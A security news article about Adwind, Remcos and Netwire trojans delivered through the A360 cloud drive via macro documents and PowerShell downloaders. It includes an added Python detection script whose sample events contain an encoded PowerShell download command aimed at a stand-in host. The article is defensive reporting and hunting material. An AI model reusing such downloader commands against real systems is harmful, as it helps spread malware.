Thursday, October 3, 2024

Beware!! Dangerous RATs Called “Adwind, Remcos, Netwire” Delivered via A360 Cloud Drive

The widely used A360 cloud drive platform is being abused to deliver the Adwind, Remcos, and Netwire remote access Trojans, with the file-sharing site used as a malware distribution platform to host the malware.

Nowadays, many cloud platforms are used as malware delivery platforms, both hosting malicious files and serving as command-and-control (C&C) infrastructure.

In this case, the command-and-control servers are resolved through free DNS services, which helps the RATs/backdoors phone back to their respective command-and-control servers after the malicious RAT file is downloaded and executed.

“A360 is a cloud-based workspace that centralizes, connects and organizes your team and project information across your desktop, the web, and mobile devices.” A360 Drive provides online storage for collaboration. Anyone can create an account for free and is given 5GB of space.

According to a Trend Micro report, the U.S., South Africa, France, Italy, Germany, Hong Kong, and the U.K. were the most affected by the distributed Adwind, Remcos, and Netwire RATs.


How Do These RATs Abuse the Cloud Infrastructure

These 3 RATs initially spread via spam email campaigns, with different malware variants and functions.

Adwind RAT was initially discovered as a JAR file (JAVA_ADWIND.JEJPDY) that connects to the C&C server when the script is executed. Later, it retrieves and exfiltrates multifarious data, including credentials, keystrokes, and multimedia files.


NETWIRE RAT was identified through a spam email campaign with an attached file (JAVA_KRYPTIK.NPP) containing a Java ARchive (JAR) along with an executable script. Further analysis confirms that it has string references to the NETWIRE remote access tool, with keylogging and SOCKS proxy capabilities.

Trend Micro discovered a document file, identified as “AMMO REQUEST MOD Turkey.doc” (W2KM_DROPPR.XWD), that contains a generic template for macro malware used to abuse A360 Drive.

The macro file is an encrypted and obfuscated executable that is finally decrypted. It contains a payload that is a malicious PowerShell script, which downloads a file from A360 Drive and executes it.

The downloaded payload is a Visual Basic obfuscated executable file. Deobfuscating it reveals the Trojanized Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums, Trend Micro said.
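One way to hunt for the chain described above (an Office document macro launching PowerShell that fetches a file from a cloud drive), as an added example that is not from the original article or from Trend Micro. The watched host `cloud-drive.example`, the event field names and the sample events are constructed assumptions; substitute the file-sharing domains and process-creation log schema of your own environment.

```python
import base64
import re
from urllib.parse import urlparse

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumption: placeholder for the file-sharing hosts you want to watch.
WATCHED_HOSTS = {"cloud-drive.example"}
# -EncodedCommand and its common abbreviations (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?<!\S)-(?:en[a-z]*|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def expand_command(cmdline):
    """Return the raw command line plus any decoded -EncodedCommand text."""
    texts = [cmdline]
    for blob in ENC_FLAG.findall(cmdline):
        try:  # PowerShell expects base64 over UTF-16LE
            texts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:
            pass  # not a valid encoded command; keep only the raw text
    return texts

def find_macro_download_chain(events, watched=WATCHED_HOSTS):
    """Flag Office -> PowerShell launches that reference a watched host."""
    alerts = []
    for ev in events:
        if (basename(ev["parent"]) not in OFFICE_PARENTS
                or basename(ev["image"]) not in SHELLS):
            continue
        for text in expand_command(ev["cmdline"]):
            for url in URL.findall(text):
                host = (urlparse(url).hostname or "").lower()
                if any(host == h or host.endswith("." + h) for h in watched):
                    alerts.append({"host": ev["host"], "url": url})
    return alerts

def encode_ps(script):  # helper used only to build the constructed sample
    return base64.b64encode(script.encode("utf-16-le")).decode()

OFFICE = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"host": "ws01", "parent": OFFICE, "image": PS,
     "cmdline": "powershell -nop -enc " + encode_ps("iwr https://cloud-drive.example/f/1")},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell iwr https://cloud-drive.example/f/1"},
    {"host": "ws03", "parent": OFFICE, "image": PS,
     "cmdline": "powershell iwr https://intranet.example.org/report.csv"},
]
```

Only `ws01` is flagged: `ws02` has no Office parent and `ws03` contacts a host that is not on the watch list.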

Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
